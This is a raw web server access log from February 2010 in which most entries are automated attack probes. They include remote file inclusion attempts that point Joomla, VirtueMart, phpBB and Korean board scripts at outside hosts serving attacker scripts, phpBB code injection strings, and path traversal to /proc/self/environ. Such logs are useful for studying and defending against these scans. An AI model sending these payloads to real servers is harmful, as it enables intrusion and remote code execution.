125.141.91.138 - - [01/Feb/2010:09:03:19 -0800] "GET /~t290/logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diskplus.kr/shop//psybnc/empik1.txt?? HTTP/1.1" 404 300 /home/users/t/t290/public_html/logs/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
62.141.56.136 - - [01/Feb/2010:09:05:06 -0800] "GET /~t290//com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 326 /home/users/t/t290/public_html/com_virtuemart "-" "Mozilla/5.0" 0 web.hypersurf.com
62.141.56.136 - - [01/Feb/2010:09:05:06 -0800] "GET /~t290/logs//com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs//com_virtuemart "-" "Mozilla/5.0" 0 web.hypersurf.com
62.141.56.136 - - [01/Feb/2010:09:05:06 -0800] "GET /~t290/logs/access.log.0%20%20//com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 346 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
194.63.235.156 - - [01/Feb/2010:09:06:41 -0800] "GET /~t290//skin/ggambo7002_board/write.php?dir=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 306 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
194.63.235.156 - - [01/Feb/2010:09:06:41 -0800] "GET /~t290/logs//skin/ggambo7002_board/write.php?dir=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 311 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com /home/users/h/hyper/public_html//skin194.63.235.156 - - [01/Feb/2010:09:06:41 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 302 289 /home/users/h/hyper/public_
194.63.235.156 - - [01/Feb/2010:09:06:41 -0800] "GET /~t290/logs/access.log%20%20//skin/ggambo7002_board/write.php?dir=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 324 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
194.63.235.156 - - [01/Feb/2010:09:06:54 -0800] "GET /~t290//skin/ggambo7002_board/write.php?dir=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 306 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
194.63.235.156 - - [01/Feb/2010:09:06:54 -0800] "GET /~t290/logs//skin/ggambo7002_board/write.php?dir=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 311 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
194.63.235.156 - - [01/Feb/2010:09:06:54 -0800] "GET /~t290/logs/access.log%20%20//skin/ggambo7002_board/write.php?dir=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 324 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
194.63.235.156 - - [01/Feb/2010:09:06:57 -0800] "GET /~t290/logs//skin/ggambo7002_board/write.php?dir=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 311 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
194.63.235.156 - - [01/Feb/2010:09:06:57 -0800] "GET /~t290//skin/ggambo7002_board/write.php?dir=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 306 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
194.63.235.156 - - [01/Feb/2010:09:06:57 -0800] "GET /~t290/logs/access.log%20%20//skin/ggambo7002_board/write.php?dir=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 324 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
194.63.235.156 - - [01/Feb/2010:09:07:23 -0800] "GET /~t290/logs/access.log.0%20%20//skin/ggambo7002_board/write.php?dir=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 326 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
194.63.235.156 - - [01/Feb/2010:09:07:40 -0800] "GET /~t290/logs/access.log.0%20%20//skin/ggambo7002_board/write.php?dir=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 326 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
194.63.235.156 - - [01/Feb/2010:09:07:44 -0800] "GET /~t290/logs/access.log.0%20%20//skin/ggambo7002_board/write.php?dir=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 326 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
116.40.122.117 - - [01/Feb/2010:09:09:16 -0800] "GET /~t290/logs/access.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 346 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
116.40.122.117 - - [01/Feb/2010:09:09:16 -0800] "GET /~t290/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 328 /home/users/t/t290/public_html/mygallery "-" "Mozilla/5.0" 0 web.hypersurf.com
116.40.122.117 - - [01/Feb/2010:09:09:16 -0800] "GET /~t290/logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 333 /home/users/t/t290/public_html/logs/mygallery "-" "Mozilla/5.0" 0 web.hypersurf.com
116.40.122.117 - - [01/Feb/2010:09:12:13 -0800] "GET /~t290/logs/access.log.0%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 348 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
219.240.36.36 - - [01/Feb/2010:09:17:10 -0800] "GET /~t290/logs/access.log//forumdisplay.php?fid=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 319 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
219.240.36.36 - - [01/Feb/2010:09:17:10 -0800] "GET /~t290//forumdisplay.php?fid=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 303 /home/users/t/t290/public_html/forumdisplay.php "-" "Mozilla/5.0" 0 web.hypersurf.com
219.240.36.36 - - [01/Feb/2010:09:17:10 -0800] "GET /~t290/logs//forumdisplay.php?fid=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 308 /home/users/t/t290/public_html/logs//forumdisplay.php "-" "Mozilla/5.0" 0 web.hypersurf.com
116.40.122.117 - - [01/Feb/2010:09:26:08 -0800] "GET /~t290//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 307 /home/users/t/t290/public_html/bbs "-" "Mozilla/5.0" 0 web.hypersurf.com
116.40.122.117 - - [01/Feb/2010:09:26:09 -0800] "GET /~t290/logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
116.40.122.117 - - [01/Feb/2010:09:26:09 -0800] "GET /~t290/logs//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs//bbs "-" "Mozilla/5.0" 0 web.hypersurf.com
116.40.122.117 - - [01/Feb/2010:09:29:49 -0800] "GET /~t290/logs/access.log.0%20%20//bbs/write_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt? HTTP/1.1" 404 327 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
110.45.136.177 - - [01/Feb/2010:09:35:40 -0800] "GET /~t290//modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 315 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
110.45.136.177 - - [01/Feb/2010:09:35:40 -0800] "GET /~t290/logs/access.log.0//modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 333 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
110.45.136.177 - - [01/Feb/2010:09:35:41 -0800] "GET /~t290/logs//modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 320 /home/users/t/t290/public_html/logs//modules "-" "Mozilla/5.0" 0 web.hypersurf.com
110.45.136.177 - - [01/Feb/2010:09:35:41 -0800] "GET /~t290//modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 315 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
110.45.136.177 - - [01/Feb/2010:09:35:41 -0800] "GET /~t290/logs//modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 320 /home/users/t/t290/public_html/logs//modules "-" "Mozilla/5.0" 0 web.hypersurf.com
110.45.136.177 - - [01/Feb/2010:09:35:41 -0800] "GET /~t290/logs/access.log.0//modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 333 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
110.45.136.177 - - [01/Feb/2010:09:36:03 -0800] "GET /~t290/logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
110.45.136.177 - - [01/Feb/2010:09:36:04 -0800] "GET /~t290/logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
77.221.130.15 - - [01/Feb/2010:09:44:22 -0800] "GET /~t290/logs//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
77.221.130.15 - - [01/Feb/2010:09:44:22 -0800] "GET /~t290//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 311 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
77.221.130.15 - - [01/Feb/2010:09:44:22 -0800] "GET /~t290/logs/access.log.0%20%20//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
67.195.115.185 - - [01/Feb/2010:09:53:41 -0800] "GET /~t290/twllpicts/loonlake1/source/16.htm HTTP/1.0" 200 655 /home/users/t/t290/public_html/twllpicts/loonlake1/source/16.htm "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
200.234.200.155 - - [01/Feb/2010:10:39:02 -0800] "GET /~t290/logs/access.log//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 375 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" 0 web.hypersurf.com
200.234.200.155 - - [01/Feb/2010:10:39:03 -0800] "GET /~t290/logs/access.log//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 375 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" 0 web.hypersurf.com
211.193.131.164 - - [01/Feb/2010:10:39:06 -0800] "GET /~t290/logs////bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 317 /home/users/t/t290/public_html/logs////bbs "-" "Mozilla/5.0" 0 web.hypersurf.com
211.193.131.164 - - [01/Feb/2010:10:39:07 -0800] "GET /~t290/logs/access.log////bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
211.193.131.164 - - [01/Feb/2010:10:39:07 -0800] "GET /~t290////bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 312 /home/users/t/t290/public_html/bbs "-" "Mozilla/5.0" 0 web.hypersurf.com
87.239.23.19 - - [01/Feb/2010:10:57:05 -0800] "GET /~t290/logs/access.log%20%20//phpBB2////viewtopic.php?p=777&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
87.239.23.19 - - [01/Feb/2010:10:57:05 -0800] "GET /~t290//phpBB2////viewtopic.php?p=777&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 310 /home/users/t/t290/public_html/phpBB2 "-" "Mozilla/5.0" 0 web.hypersurf.com
87.239.23.19 - - [01/Feb/2010:10:57:05 -0800] "GET /~t290/logs//phpBB2////viewtopic.php?p=777&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs//phpBB2 "-" "Mozilla/5.0" 0 web.hypersurf.com
121.88.4.141 - - [01/Feb/2010:11:00:02 -0800] "GET /~t290/logs/access.log.0%20%20//skin/zero_vote/error.php?dir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
121.88.4.141 - - [01/Feb/2010:11:00:02 -0800] "GET /~t290//skin/zero_vote/error.php?dir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 311 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
121.88.4.141 - - [01/Feb/2010:11:00:02 -0800] "GET /~t290/logs//skin/zero_vote/error.php?dir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
87.239.23.19 - - [01/Feb/2010:11:06:05 -0800] "GET /~t290/logs/access.log//phpBB2////viewtopic.php?p=777&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 326 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
211.39.145.146 - - [01/Feb/2010:11:08:50 -0800] "GET /~t290/logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 375 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
211.39.145.146 - - [01/Feb/2010:11:08:50 -0800] "GET /~t290///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 359 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
211.39.145.146 - - [01/Feb/2010:11:08:50 -0800] "GET /~t290/logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 364 /home/users/t/t290/public_html/logs///administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
200.234.200.155 - - [01/Feb/2010:11:14:13 -0800] "GET /~t290/logs/access.log.0//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 377 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" 0 web.hypersurf.com
200.234.200.155 - - [01/Feb/2010:11:14:14 -0800] "GET /~t290/logs/access.log.0//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 377 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" 0 web.hypersurf.com
84.19.168.8 - - [01/Feb/2010:11:23:25 -0800] "GET /~t290/logs/access.log.0%20%20/?board_skin_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
84.19.168.8 - - [01/Feb/2010:11:23:25 -0800] "GET /~t290/logs/?board_skin_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 200 13385 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
84.19.168.8 - - [01/Feb/2010:11:23:25 -0800] "GET /~t290/?board_skin_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 200 897 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
67.195.115.185 - - [01/Feb/2010:11:28:19 -0800] "GET /~t290/logs/?D=D HTTP/1.0" 200 13352 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
67.195.115.185 - - [01/Feb/2010:11:59:35 -0800] "GET /~t290/logs/stats-2003/Oct.wwwstats.html.gz HTTP/1.0" 404 310 /home/users/t/t290/public_html/logs/stats-2003 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
210.205.6.114 - - [01/Feb/2010:11:59:36 -0800] "GET /~t290/logs/access.log.0//com_moofaq/includes/file_includer.php?gzip=0&file=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.79" 0 web.hypersurf.com
210.205.6.114 - - [01/Feb/2010:11:59:37 -0800] "GET /~t290/logs//com_moofaq/includes/file_includer.php?gzip=0&file=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 329 /home/users/t/t290/public_html/logs//com_moofaq "-" "libwww-perl/5.79" 0 web.hypersurf.com
220.73.144.196 - - [01/Feb/2010:11:59:46 -0800] "GET /~t290/logs/access.log.0//delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt???? HTTP/1.1" 404 319 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
220.73.144.196 - - [01/Feb/2010:11:59:46 -0800] "GET /~t290/logs//delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt???? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs//delete_all.php "-" "Mozilla/5.0" 0 web.hypersurf.com
220.73.144.196 - - [01/Feb/2010:11:59:47 -0800] "GET /~t290//delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt???? HTTP/1.1" 404 301 /home/users/t/t290/public_html/delete_all.php "-" "Mozilla/5.0" 1 web.hypersurf.com
210.205.6.114 - - [01/Feb/2010:12:01:25 -0800] "GET /~t290/logs/access.log//com_moofaq/includes/file_includer.php?gzip=0&file=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 340 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.79" 0 web.hypersurf.com
67.195.115.185 - - [01/Feb/2010:12:04:34 -0800] "GET /~t290/twllpicts/island/source/?S=A HTTP/1.0" 200 3063 /home/users/t/t290/public_html/twllpicts/island/source/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
121.88.4.141 - - [01/Feb/2010:12:09:21 -0800] "GET /~t290//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 320 /home/users/t/t290/public_html/PhpLinkExchange "-" "Mozilla/5.0" 0 web.hypersurf.com
121.88.4.141 - - [01/Feb/2010:12:09:21 -0800] "GET /~t290/logs/access.log.0%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 340 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
121.88.4.141 - - [01/Feb/2010:12:09:21 -0800] "GET /~t290/logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs//PhpLinkExchange "-" "Mozilla/5.0" 0 web.hypersurf.com
121.88.4.141 - - [01/Feb/2010:12:10:17 -0800] "GET /~t290/logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 338 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
67.195.115.185 - - [01/Feb/2010:12:20:25 -0800] "GET /~t290/logs/stats-2002/Nov.wwwstats.html.gz HTTP/1.0" 404 310 /home/users/t/t290/public_html/logs/stats-2002 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
188.138.32.230 - - [01/Feb/2010:12:22:20 -0800] "GET /~t290/logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 354 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
188.138.32.230 - - [01/Feb/2010:12:22:20 -0800] "GET /~t290///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 338 /home/users/t/t290/public_html/components "-" "Mozilla/5.0" 0 web.hypersurf.com
188.138.32.230 - - [01/Feb/2010:12:22:20 -0800] "GET /~t290/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://188.165.37.25/Nea/scanZ/id1.txt? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///components "-" "Mozilla/5.0" 0 web.hypersurf.com
121.88.4.141 - - [01/Feb/2010:12:24:24 -0800] "GET /~t290/logs/access.log.0//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 338 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
121.88.4.141 - - [01/Feb/2010:12:24:50 -0800] "GET /~t290/logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 336 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
211.39.145.146 - - [01/Feb/2010:12:32:50 -0800] "GET /~t290/logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 300 /home/users/t/t290/public_html/logs/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
211.39.145.146 - - [01/Feb/2010:12:32:50 -0800] "GET /~t290/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 295 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
211.39.145.146 - - [01/Feb/2010:12:32:50 -0800] "GET /~t290/logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 311 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
121.88.4.141 - - [01/Feb/2010:13:06:30 -0800] "GET /~t290/logs/access.log////////?mosConfig_absolute_path=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 309 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
121.88.4.141 - - [01/Feb/2010:13:06:30 -0800] "GET /~t290/logs////////?mosConfig_absolute_path=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 200 13396 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
121.88.4.141 - - [01/Feb/2010:13:06:30 -0800] "GET /~t290////////?mosConfig_absolute_path=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 200 909 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:08:49 -0800] "GET /~t290///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 305 /home/users/t/t290/public_html/kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:08:49 -0800] "GET /~t290/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 /home/users/t/t290/public_html/logs///kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:08:49 -0800] "GET /~t290/logs/access.log.0%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:08:56 -0800] "GET /~t290///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 305 /home/users/t/t290/public_html/kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:08:56 -0800] "GET /~t290/logs/access.log.0%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:08:56 -0800] "GET /~t290/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 /home/users/t/t290/public_html/logs///kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:06 -0800] "GET /~t290///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 305 /home/users/t/t290/public_html/kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
